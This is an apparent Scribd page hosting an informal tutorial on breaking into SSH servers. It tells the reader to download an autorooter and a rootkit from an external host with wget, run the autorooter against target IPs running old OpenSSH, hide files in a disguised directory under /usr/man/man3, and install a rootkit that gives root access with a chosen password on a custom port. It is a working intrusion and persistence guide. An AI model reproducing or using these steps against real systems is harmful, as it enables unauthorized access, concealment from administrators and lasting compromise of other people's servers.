This document provides instructions for hacking SSH servers using known exploits. It describes downloading tools like an SSH client and rootkit from external sites. The process involves finding vulnerable servers, using an autorooter tool to exploit known vulnerabilities in older SSH versions like SSH-1.99 to gain remote shell access. Once access is obtained, it describes hiding the activity by creating hidden directories and installing the rootkit to maintain persistent unauthorized access with a password of the attacker's choosing on a custom port.
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0 ratings0% found this document useful (0 votes)
122 views2 pages
SSH Hacking
This document provides instructions for hacking SSH servers using known exploits. It describes downloading tools like an SSH client and rootkit from external sites. The process involves finding vulnerable servers, using an autorooter tool to exploit known vulnerabilities in older SSH versions like SSH-1.99 to gain remote shell access. Once access is obtained, it describes hiding the activity by creating hidden directories and installing the rootkit to maintain persistent unauthorized access with a password of the attacker's choosing on a custom port.
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2
SSH Hacking
a little tut i came across :-)
SSH is like a Telnet client, but more secure.. Most older but used versions are hackable and its very easy.. ..if you know how.. First.. DONT Give away this tutorial.. I DOnt want any shit with other n00bs who read this mmkay ?? I TRUST YOU GUYS !! First, we need some tools secureCRT (h**ps://secure.vandyke.com/vandyke-...ODUCT=SecureCRT) A SSH Client to connect to an SSH box.. With this version u can SSH with a proxy LNX r00tkit (h**p://gaajus.gearhost.net/lnx.gz) a rootkit, best there is i think.. Very easy to use.. Only needed in last step X6 (h**p://gaajus.gearhost.net/x6.tgz) The Autorooter.. First, you gotta have a scan with vulernable ips (or just one ) WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULERNABLE Almost always works for exploiting.. Lets say we got an IP, 0.0.0.0, and a shell.. Connect to your shell and type : wget h**p://gaajus.gearhost.net/x6.tgz it downloads the autorooter to the shell.. When its done, Type : tar xzvf x6.tgz Then type cd x6 When in the dir, type : ./x6 -t# it shows u all the Exploitable SSH Versions.. Lets say we got an exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list) The Ip = 0.0.0.0 you type : ./x6 -t123 0.0.0.0 Now it says something like : ATTACH NOW.. Wait 6 Seconds then push Enter.. Normally it starts exploiting, it says like 1. 0x0000000 . . [SEGV] 2. 0x00000c4 . . [SURVIVED] Something like that.. Just let it go and it will exploit your box.. If it doesnt go to 1. ..., and it says FATAL: no its not vulernable Then, when it exploited the box, u get some thing like : no crash been found Rem from Remote : CHRIS CHRIS *** YOU ARE IN *** Boxname Boxhost blahblah then type the following cd /usr/man/man3/ and then : mkdir ... and then : cd ... This is an hidden dir so the Sysop wont notice Now we r going to download the Rootkit type : wget h**p://gaajus.gearhost.net/lnx.gz It will start downloading.. When done, type : tar xzvf lnx.gz and then: cd lnx Then, we r going to start it.. Lets say u want password "poop" on port 25374 then u type : ./own poop 25374 It Installs the Rootkit, and Done !! Connect to the ip with port 25374 (or the one u took) Username = root and u gave the password urself..
The DNS System Consists of Three Components: DNS Data (Called Resource Records), Servers (Called Name Servers), and Internet Protocols For Fetching Data From The Servers